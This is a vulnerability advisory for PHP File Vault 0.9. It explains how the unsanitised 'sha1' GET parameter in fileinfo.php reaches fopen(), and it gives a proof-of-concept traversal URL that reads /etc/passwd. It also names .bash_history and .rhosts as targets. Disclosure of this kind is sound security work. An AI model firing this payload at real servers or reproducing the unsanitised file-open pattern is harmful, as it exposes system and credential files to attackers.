PHP File Vault 0.9 Directory Traversal / File Read

`PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty   
==================================================================================  
  
  
Discovered by N_A, N_A[at]tutanota.com  
======================================  
  
  
  
  
Description  
===========  
  
  
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.  
  
https://sourceforge.net/projects/php-file-vault  
  
  
  
Vulnerability  
=============  
  
  
The vulnerability exists within the fileinfo.php file of the package:  
  
  
A A A if (empty($_GET['sha1'])) die("sha1 is required to get file info");  
A A A $sha1 = trim($_GET['sha1']);  
  
  
the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to  
the fopen() function within PHP:  
  
  
  
A A A A A A function parseFileInfo($fi) {  
A A A A A A $fh = fopen($fi,'r');  
A A A A A A $fname = trim(fgets($fh));  
A A A A A A fclose($fh);  
A A A A A A return array($fname);  
A A A A A }  
  
  
  
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:  
  
A A A A A A if (!is_readable(FI.$sha1)) die("cannot read file info!");  
A A A A A A list($fname) = parseFileInfo(FI.$sha1);  
  
A A A A A A readfile('head.html');  
  
A A A A A A if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";  
  
  
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.  
  
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.  
  
  
Proof Of Concept  
================  
  
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd  
  
  
  
`